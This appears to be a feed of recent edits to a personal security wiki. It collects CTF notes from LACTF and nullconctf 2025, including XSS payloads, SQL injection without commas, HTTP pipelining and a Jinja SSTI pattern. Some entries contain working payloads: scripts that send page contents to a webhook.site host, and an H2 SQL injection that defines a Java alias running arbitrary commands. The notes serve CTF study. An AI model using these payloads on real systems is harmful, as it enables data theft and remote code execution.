http://abyss.osorin.net/ 2026-05-03T09:38:58+00:00 http://abyss.osorin.net/ http://abyss.osorin.net/_media/wiki:logo.png text/html 2026-03-12T02:59:05+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/lockpicking:index?rev=1773284345&do=diff Index for Lockpicking Topics Read my latest physical security post in our research blog i0.rs: <https://i0.rs/blog/introduction-to-physical-security-lock-picking-on-a-budget/> text/html 2026-03-05T19:36:06+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/playground:poc_trigger?rev=1772739366&do=diff text/html 2025-02-20T01:10:26+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/xss-payloads?rev=1740013826&do=diff XSS Payloads LACTF Some payloads from LACTF 2025: [WEB] purell <https://github.com/uclaacm/lactf-archive/blob/main/2025/web/purell/payloads.txt> <script> fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML)) </script> <img src=/f onerror=fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML))> <SCRIPT> fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+e… text/html 2025-02-09T23:20:39+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/sqli-no-commas?rev=1739143239&do=diff SQLi No Commas Lessons learned from nullconctf 2025: [WEB] paginator v2 Basically sqli without commas: <https://www.sidechannel.blog/en/sql-injection-there-was-a-comma-halfway/> <https://mindcrafters.xyz/writeups/nullconctf-2025-web/> text/html 2025-02-09T23:04:12+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/http-pipelining?rev=1739142252&do=diff HTTP Pipelining + HTTP/2 Single Packets Lessons learned from LACTF 2025: [WEB] whats-my-number TL;DR: Get enough Math.random values to crack with randcrack (V8). In order to “race” (not really) and get consecutive values, you must send your requests with http pipelining or http/2 single packets. text/html 2025-02-09T23:03:05+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/3dprinting:index?rev=1739142185&do=diff Index for 3D Printed Miniatures soon™ text/html 2024-12-09T22:03:00+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/pydantic-jinja-ssti?rev=1733781780&do=diff Pydantic email validator + jinja ssti class EmailModel(BaseModel): email: EmailStr @app.route('/render', methods=['POST']) def render_email(): email = request.form.get('email') try: email_obj = EmailModel(email=email) return Template(email_template%(email)).render() except ValidationError as e: return render_template('mail.html', error="Invalid email format.") text/html 2024-12-02T22:30:51+00:00 osorin (osorin@undisclosed.example.com) http://abyss.osorin.net/java-h2-sqli-rce?rev=1733178651&do=diff H2 SQL injection to RCE http://localhost:1338/api/note?name=aa'; CREATE ALIAS BOBOB AS 'String e(String cmd) throws java.io.IOException{ try { java.lang.Runtime rt = java.lang.Runtime.getRuntime(); java.lang.Process proc = rt.exec(cmd); java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream())); String line; StringBuilder output = new StringBuilder(); while ((line = reader.readLine…